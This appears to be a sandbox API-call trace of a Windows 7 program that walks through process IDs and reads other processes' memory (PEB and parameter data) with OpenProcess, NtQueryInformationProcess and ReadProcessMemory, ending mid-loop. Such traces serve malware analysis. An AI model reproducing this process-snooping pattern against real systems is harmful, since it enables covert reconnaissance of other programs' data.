[0411.103] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.103] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.124] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0
[0411.124] CloseHandle (hObject=0x0) returned 0
[0411.125] _ui64tow (_Value=0x254, _Buffer="488", _Radix=10) returned="596"
[0411.130] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="596") returned 3
[0411.131] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.131] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0
[0411.154] CloseHandle (hObject=0x0) returned 0
[0411.154] _ui64tow (_Value=0x298, _Buffer="596", _Radix=10) returned="664"
[0411.159] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="664") returned 3
[0411.160] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.160] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.184] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0
[0411.184] CloseHandle (hObject=0x0) returned 0
[0411.185] _ui64tow (_Value=0x2c8, _Buffer="664", _Radix=10) returned="712"
[0411.189] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="712") returned 3
[0411.191] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.191] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0
[0411.211] CloseHandle (hObject=0x0) returned 0
[0411.212] _ui64tow (_Value=0x338, _Buffer="712", _Radix=10) returned="824"
[0411.217] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="824") returned 3
[0411.218] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.218] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.249] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0
[0411.249] CloseHandle (hObject=0x0) returned 0
[0411.250] _ui64tow (_Value=0x36c, _Buffer="824", _Radix=10) returned="876"
[0411.254] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="876") returned 3
[0411.255] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.255] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.281] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0
[0411.281] CloseHandle (hObject=0x0) returned 0
[0411.282] _ui64tow (_Value=0x3fc, _Buffer="876", _Radix=10) returned="1020"
[0411.287] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1020") returned 4
[0411.288] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.288] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3fc) returned 0x0
[0411.311] CloseHandle (hObject=0x0) returned 0
[0411.311] _ui64tow (_Value=0x3d0, _Buffer="1020", _Radix=10) returned="976"
[0411.316] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="976") returned 3
[0411.317] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.317] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.339] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d0) returned 0x24c
[0411.340] GetLastError () returned 0x0
[0411.340] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdb018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.340] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3327f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.341] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x332688, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.342] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.343] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.343] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdb020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.343] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x331e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.343] malloc (_Size=0x3e) returned 0x2bd180
[0411.343] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3326c0, lpBuffer=0x2bd180, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd180*, lpNumberOfBytesRead=0x0) returned 1
[0411.343] free (_Block=0x2bd180)
[0411.344] CloseHandle (hObject=0x24c) returned 1
[0411.345] _ui64tow (_Value=0x410, _Buffer="976", _Radix=10) returned="1040"
[0411.349] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1040") returned 4
[0411.350] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.350] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.388] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x0
[0411.388] CloseHandle (hObject=0x0) returned 0
[0411.389] _ui64tow (_Value=0x470, _Buffer="1040", _Radix=10) returned="1136"
[0411.395] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1136") returned 4
[0411.396] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.396] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.420] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x0
[0411.420] CloseHandle (hObject=0x0) returned 0
[0411.421] _ui64tow (_Value=0x490, _Buffer="1136", _Radix=10) returned="1168"
[0411.426] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1168") returned 4
[0411.427] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.427] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.512] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x24c
[0411.512] GetLastError () returned 0x0
[0411.512] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.512] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd6018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.513] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.513] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d27c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.513] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d2688, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.514] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.515] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.515] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffd6020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.516] malloc (_Size=0x20) returned 0x2bfe40
[0411.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2d26ca, lpBuffer=0x2bfe40, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bfe40*, lpNumberOfBytesRead=0x0) returned 1
[0411.516] free (_Block=0x2bfe40)
[0411.517] CloseHandle (hObject=0x24c) returned 1
[0411.518] _ui64tow (_Value=0x4b0, _Buffer="1168", _Radix=10) returned="1200"
[0411.523] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1200") returned 4
[0411.525] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.525] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.549] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b0) returned 0x0
[0411.549] CloseHandle (hObject=0x0) returned 0
[0411.550] _ui64tow (_Value=0x778, _Buffer="1200", _Radix=10) returned="1912"
[0411.555] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1912") returned 4
[0411.578] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.578] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.600] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x778) returned 0x24c
[0411.600] GetLastError () returned 0x0
[0411.600] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x262820, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.601] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2626a6, lpBuffer=0x12dd100, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.602] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.603] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x261e90, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.604] malloc (_Size=0x32) returned 0x2be140
[0411.604] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2626d6, lpBuffer=0x2be140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2be140*, lpNumberOfBytesRead=0x0) returned 1
[0411.604] free (_Block=0x2be140)
[0411.605] CloseHandle (hObject=0x24c) returned 1
[0411.606] _ui64tow (_Value=0x628, _Buffer="1912", _Radix=10) returned="1576"
[0411.611] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1576") returned 4
[0411.612] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.612] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.632] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x628) returned 0x0
[0411.632] CloseHandle (hObject=0x0) returned 0
[0411.632] _ui64tow (_Value=0x2b0, _Buffer="1576", _Radix=10) returned="688"
[0411.636] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="688") returned 3
[0411.638] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.638] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2b0) returned 0x0
[0411.694] CloseHandle (hObject=0x0) returned 0
[0411.695] _ui64tow (_Value=0x6a4, _Buffer="688", _Radix=10) returned="1700"
[0411.700] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1700") returned 4
[0411.701] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.701] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.724] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x0
[0411.725] CloseHandle (hObject=0x0) returned 0
[0411.726] _ui64tow (_Value=0x73c, _Buffer="1700", _Radix=10) returned="1852"
[0411.731] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1852") returned 4
[0411.732] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.732] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.779] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x73c) returned 0x24c
[0411.779] GetLastError () returned 0x0
[0411.779] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.779] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d29e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.780] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d2796, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.782] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.783] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.783] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.783] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d1ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.784] malloc (_Size=0x8a) returned 0x2e1a70
[0411.784] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1d2802, lpBuffer=0x2e1a70, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1a70*, lpNumberOfBytesRead=0x0) returned 1
[0411.784] free (_Block=0x2e1a70)
[0411.785] CloseHandle (hObject=0x24c) returned 1
[0411.786] _ui64tow (_Value=0x728, _Buffer="1852", _Radix=10) returned="1832"
[0411.792] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1832") returned 4
[0411.794] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.794] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x728) returned 0x24c
[0411.821] GetLastError () returned 0x0
[0411.821] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.821] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
